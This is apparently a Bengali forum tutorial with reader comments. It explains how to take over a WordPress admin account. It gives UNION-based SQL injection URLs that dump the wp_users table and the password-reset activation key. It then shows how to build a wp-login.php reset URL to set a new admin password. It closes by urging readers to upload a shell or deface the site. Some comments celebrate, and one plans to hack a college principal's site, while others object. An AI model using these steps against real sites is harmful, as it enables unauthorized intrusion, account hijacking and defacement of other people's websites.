WordPress সাইটে SQLi এবং শেল আপলোড

ওয়ার্ডপ্রেস অত্যান্ত জনপ্রিয় একটা ওয়েব সফটওয়্যার। বলা বাহুল্য, ওয়েবডিজাইনারদের সাথে সাথে হ্যাকারদেরও একটা প্রিয় সফটওয়্যার :D

কারন এই সফটওয়্যারএ ব্যাবহার করা হয় নানা প্ল্যাগিন আর থিমস যেখানে অনেক ধরনের সিকিউরিটি দুর্বলতা থাকে।

এখন আমি বোঝানোর চেস্টা করবো, কীভাবে WP সাইটে SQLi করার পরে এডমিন এক্সেস নিবেন এবং শেল আপলোড দিয়ে সাইট ডিফেস করবেন।

আর হ্যা, আপনি যদি ম্যানুয়াল SQLi না পারেন তাহলে এই পোস্ট আপনার জন্যে না। আগে শিখে পরে এই পোস্ট পড়বেন।

কারন আমি এখানে কি ভাবে SQL Inject করা যায় সেটা আলোচনা করবোনা। পরবর্তীতে একটা পোস্ট দেবার ইচ্ছা আছে এইটা নিয়ে। অথবা টিটতে সার্চ করলেও বাংলা টুট পাবার কথা।

মনে করুন আমি একটা WP সাইটে এস্কিউএল মারলাম। এডমিন আইডি পেলাম পাসওয়ার্ডও পেলাম। কিন্তু সমস্যাটাই হয়ে যায় এই পাসওয়ার্ডে। এটা আমরা পেয়ে থাকি MD5 এনক্রিপ্টেড অবস্থায় যা ভাঙা অনেক ঝামেলা আর সময়ের ব্যাপার। আর আপন যদি নতুন হ্যাকার হয়ে থাকেন তাহলে তো কথাই নেই। মনে হবে এভারেস্ট জয়ের মত একটা ব্যাপার। :D

আর এই ঝামেলা থেকে মুক্তি দিতেই আজ আমার এই পোস্টের অবতারণা। :D

আসুন এবার কাজে নেমে যাই।

https://www.site.com/index.php?id=-92 UNION SELECT 1,2,3,4,group_concat(ID,0×40,user_login,0×40,user_pass,0×40,user_nicename,0×40,user_email,0×40,user_url,0×40,user_registered,0×40,user_activation_key,0×40,user_status,0×40,display_name),6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users

মনে করি এটাই আমার ভিক্টিমের সাইট। এবং এস্কিউএল এর মাধ্যমে আমরা wp_users টেবিলের সব ডাটা পেয়ে গেলাম।

Ex. 1@admin@$P$BB3TMj.lT1ShUFL5gd31Yf7DX4kKEl.@admin@admin@site.com@2012-09-18 05:16:18@@0@admin

এখানে, পাসওয়ার্ড হিসাবে যে বস্তু আমাদের সামনে আসলো সেটা মোটামুটি এইরকম :D

$P$BB3TMj.lT1ShUFL5gd31Yf7DX4kKEl.

ভয়ের কোন ব্যাপার নাই, আমি এই হিব্রু ভাষা নিয়ে ঘাটাবো না :D

যাই হোক এখান থেকে প্রথমে আমাদের যেটা দরকার তা হল,

Username: admin

Email: [email protected]

পেয়ে গেলাম আমাদের দরকারি জিনিস।

এবার ব্রাউজারে আর একটা ট্যাব ওপেন করুন।

সেখানে যেয়ে সাইটের লগিন পেজ এ যান এভাবে।

https://www.site.com/wp-login.php

এডমিন লগিন পেজ আসবে। এবার সেখান থেকে Lost your password? এ ক্লিক করে এডমিনের ই মেইল আইডি দিন। (আগেই যেটা বের করা হয়েছে)

যেমন, আমি দিলাম, [email protected]

এবার গেট নিউ পাসওয়ার্ড এ ক্লিক করুন। :D আসল কাজ এখান থেকেই শুরু।

আগের ট্যাবে ফেরত যান, user_activation_key বাদে অন্য সব ফিল্ড মুছে ফেলুন।

যেমন, https://www.site.com/index.php?id=-92 UNION SELECT 1,2,3,4,group_concat(user_activation_key),6,7,8,9,10,11,12,13,14,15,16,17,18+from+wp_users

পেজ রিলোড করুন।

দেখুন একটা user_activation_key পাবেন। ধরুন আমারটা,

xxxxxxxx

এবার সাইটে যান, এবং নিচের ইউয়ারেলটি একটু এডিট করে বসিয়ে নিন। কি এডিট করতে হবে সেটা বলছি।

wp-login.php?action=rp&key=resetkey&login=username

এখানে key=resetkey এর resetkey হল আপনি যে user_activation_key পেয়েছেন, সেটাই।

মানে হল, key=xxxxxxxx

আর login=username এর username এর স্থানে আপনি যে আইডি হ্যাক করতে চাচ্ছেন সেই ইউজারনেম দিবেন।

যেমন, login=admin

তাহলে পুরা ব্যাপারটা যা দারালো, সেটা হলঃ

wp-login.php?action=rp&key=xxxxxxxx&login=admin

এইটুকু এবার আমার ভিক্টিম এর সাইটের লেজে বসিয়ে দিলেই কাজ ৯৫% শেষ!

যেমন, https://www.site.com/wp-login.php?action=rp&key=xxxxxxxx&login=admin

এবার পাসওয়ার্ড রিসেটের একটা পেজ আসবে, সেখানে নিউ পাসওয়ার্ড দিয়ে সাইটে প্রবেশ করুন।এবার শেল ঢোকান বা সাইট ডিফেস করে ফেলুন :D

**** শুধুমাত্র শিক্ষার উদ্যেশ্যে প্রকাশিত।

এই পোস্টটি সর্বপ্রথম এখানে প্রকাশিত হয়েছে।

Level 0

আমি Snip3r। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 9 টি টিউন ও 59 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

I am nobody... so, nothing to say... :D


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

অন্যের সাইট নষ্ট করে কি পাস তোরা ? মনে রাখিস এর জন্য একদিন জবাব দিহি করতে হবে ।

আমার কমেন্টে কষ্ট পেলে ক্ষমা করবেন । আসলে সকালে টিটিতে ঢুকেই মনটা খারাপ হয়ে গেল । গতকাল বিকালে এখানে একটি পোস্ট দেখেছিলাম “ওয়ালপেপারের মাধ্যমে ইসলাম চর্চা” পোস্টটি আমার খুবই পছন্দ হয়েছিল । ভেবেছিলাম আজ সকালে ডাউনলোড করবো । কিন্তু সকালে ঢুকে দেখি টিটি সেই পোস্ট ডিলিক করে দিয়েছে । টিটির এই ইসলাম বিদ্বেষিতার জন্য আমি টিটিকে ভৎর্সনা করছি । আল্লাহ পাক আপনাদের হেদায়াত দান করুন আমীন !

Level 2

@Snip3r: tune ta chorom hoise. kintu ei doroner post na korlei ki noy. sobie to r apnar moto valo na. oneke ase etar opo babohar korbe.

Level 0

etai chaaccilam eto din youtube jajra banaye disi but painai…:(
but now principal beta jabi koi tor ee khaise tor clg er site soho
thnx maaan shotti chorom hoise…

আমি চাই না আমার মূল্যবান সাইটটি হারাতে ,
অন্যের সাইট হ্যাক করার আগে আমি নিজের সাইট এর কথা ভাবতেই কিছু করতে পারি নি ।
আশা করি সবাই আমার মত এই কথাটা মনে রাখবেন।
একবার ভাবুন আপনি যার সাইট বিনা কারনে হ্যাক করছেন তার কেমন লাগতে পারে।
তার যায়গায় নিজেকে ভাবার চেষ্টা জরুন, উত্তর পেয়ে যাবেন।

ওয়েবসাইট হ্যাক থেকে বাচার জন্য কোন সক্তিশালি টুলস আছে নাকি।
কারো যদি জানা থাকে অবশ্যই জানাবেন।

    Level 0

    @মোহাম্মাদ নয়ন খান: নিজের বুদ্ধিমত্তাকে কাজে লাগান আর Hacker দের থেকে এক কদম আগে চলার চেষ্টা করেন আশা করি ভাল ফল পাবেন।

Level 0

amader principal er valoi lagbe jodi hack kori….coz oi beta etoo kharap guardian der mukher upor opoman kore….so he should be punished………
We are TMS..;)

Level 0

kai Boi Ami Moner Sikeh Ki AnononDo Lagce Bukeh … R o Jante Visit Korun http://www.techcontinue.com And Buy Or Sell http://www.pricebazar.com

Level 0

এই ধরনের পোস্ট করার ক্ষেত্রে Authorization ব্যবহার করুন কারন এতে অন্যের ক্ষতি হতে পারে আশা করি আমার অনুরোধ টার বেপারে ভেবে দেখবেন।